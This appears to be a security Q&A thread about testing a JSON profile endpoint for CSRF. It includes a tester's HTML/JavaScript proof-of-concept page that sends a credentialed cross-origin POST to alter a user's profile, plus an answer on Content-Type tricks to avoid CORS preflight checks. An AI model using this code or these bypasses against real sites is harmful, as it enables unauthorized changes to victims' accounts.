# CSRF on JSON with origin

Tags: csrf, json

I'm testing for CSRF vulnerability, and I have a request like this:

```
Host: www.test.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 73
X-Requested-With: XMLHttpRequest
Origin: https://www.test.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"name":"test","sex":"M","birthday":"","country":"Kenya","sign":"anying"}
```

I changed the origin to evil.com and I got responses like this:

```
HTTP/2 200 OK
Date: Mon, 14 Aug 2023 13:55:45 GMT
Content-Type: application/json
Cf-Ray: 7f69b28169546b9f-SIN
Cf-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: https://www.evil.com
Set-Cookie: somecookie; Path=/; HttpOnly
Strict-Transport-Security: max-age=604800; includeSubDomains
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Set-Cookie: songLibraryNumStr=100m; Max-Age=2147483647; Expires=Sat, 01-Sep-2091 17:09:52 GMT; Path=/
Set-Cookie: birthday=; Max-Age=2147483647; Expires=Sat, 01-Sep-2091 17:09:52 GMT; Path=/
Set-Cookie: country=Kenya; Max-Age=2147483647; Expires=Sat, 01-Sep-2091 17:09:52 GMT; Path=/
Set-Cookie: sex=M; Max-Age=2147483647; Expires=Sat, 01-Sep-2091 17:09:52 GMT; Path=/
Set-Cookie: name=test; Max-Age=2147483647; Expires=Sat, 01-Sep-2091 17:09:52 GMT; Path=/
Set-Cookie: sign=anying; Max-Age=2147483647; Expires=Sat, 01-Sep-2091 17:09:52 GMT; Path=/
X-Xss-Protection: 1; mode=block
Vary: Accept-Encoding
Server: cloudflare

{"code":"success","resultData":{"code":"0","desc":"Operation successfully completed."},"desc":"Success!"}
```

There is no CSRF protection there so I think this is vulnerable to CSRF. I made a request like this:

```
<title> csrf</title>
<script>
function getMe(){
// retrieve page content
var xhttp = new XMLHttpRequest();
// now execute the CSRF attack
xhttp.open("POST",
"https://www.test.com/saveProfile", true);
xhttp.withCredentials="true";
xhttp.setRequestHeader("Content-type", "application/json;charset=utf-8");
xhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhttp.setRequestHeader("Origin", "https://attacker.com");
xhttp.send('{"name":"test1234","sex":"M","birthday":"","country":"Kenya","sign":"anying"}');
}
</script><center>
<h1>CSRF To Edit Profile</h1>
<button onclick="getMe();">Xploit Kuyy</button>
</center>
```

The code is not working and I got **cors missing allow origin** error.

Is my code wrong or is the site not vulnerable to CSRF?

Comment: seems like one's a fetch and one's a post...  the fetch triggers a pre-flight check and the server responds with "evil.com is OK by me!"  The post (which tries to set "origin" and I don't think that'll work, btw... the user-agent sets that)  seems to be sent cross-origin... now that POST request may have actually worked (depending on what protections are in place), but the browser would not show the response because it is cross-origin.

Comment: Your XMLHttpRequest leads to a CORS error (probably because the [preflight request](https://developer.mozilla.org/en-US/docs/Glossary/Preflight_request) failed), as it should. But you say that in your first request you "changed the origin", that sounds as if you have not made that request via XMLHttpRequest, but via curl or so. The entire CORS protection works only for requests made by client-side Javascript (via XMLHttpRequest or fetch), because CORS is meant to protect the _client_.

Answer (score 1):

There's a few things that could explain the problem, though you should seek out additional information. However, there are also some reasons that this shouldn't work at all, as written. I'll go over those first.

1. Is the request actually authenticated in any way? There's no cookies present in the initial request, nor any HTTP `Authorization` header. Generally, this means that the request is unauthenticated - anybody could make it - which almost completely eliminates the *point* of CSRF attacks. Why make somebody else's browser do something when you don't need any secrets it has and can do the thing yourself?
2. `Access-Control-Allow-Headers: *` in combination with `Access-Control-Allow-Credentials: true` doesn't work. More specifically, in requests with credentials (cookies, HTTP basic/digest/kerberos auth, possibly also mTLS client certificates...) [the browser will treat ACAH:* as only allowing headers literally named `*` rather than allowing a wildcard](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Headers), which is obviously useless. This is important because you can't set `Content-Type: application/json` on a cross-origin request without the server returning ACAH:Content-Type.
3. Where is the [CORS preflight request](https://developer.mozilla.org/en-US/docs/Glossary/Preflight_request)? The only request you are showing us is a `same-origin` request, so it doesn't involve CORS at all, and the browser will not send a preflight request and will completely ignore any CORS-specific headers in the response. However, to actually use this for CSRF, you'll need to make a cross-origin request, and a cross-origin request with a custom `Content-Type` (other than the three types that can be submitted by an HTML form) will trigger a CORS preflight. If the server doesn't response to the preflight in a way that authorizes everything the script wants to do, the browser will not proceed with the actual request.

Given all that, my best guess is that one or both of the following are the reason it's not working:

- You're trying to send an authenticated request, but because ACAH:* doesn't work for authenticated requests, the browser sees you as trying to use a header (`Content-Type`, technically the problem is the value of this header) without authorization, so it won't send the request.
- You're trying to send a request that requires a preflight, and the server isn't responding as expected to the preflight request. Either it doesn't handle preflight requests at all, or it does but not in a way that permits the actual request in question

Using an intercepting proxy, it should be easy to trace the requests and responses, and see where the problem occurs. You could also check the developer console in the browser; it will usually print an error message when a request fails or is disallowed for some reason, and sometimes that helps figure out the problem.

If the issue is the `Content-Type` header, there might be ways around that. Lots of servers don't actually strictly validate the content type. Some of them only require that the value contain a string, such as `application/json`, which can go after the semicolon instead of or in addition to a charset (in front of the semicolon, put one of the content types that are allowed for simple requests). Some servers don't check the CT header at all, and instead simply try to parse the request body as the expected format (JSON in this case), in which case you can set the CT of the request to `text/plain` and change nothing else, and it'll probably become a simple request without even a preflight.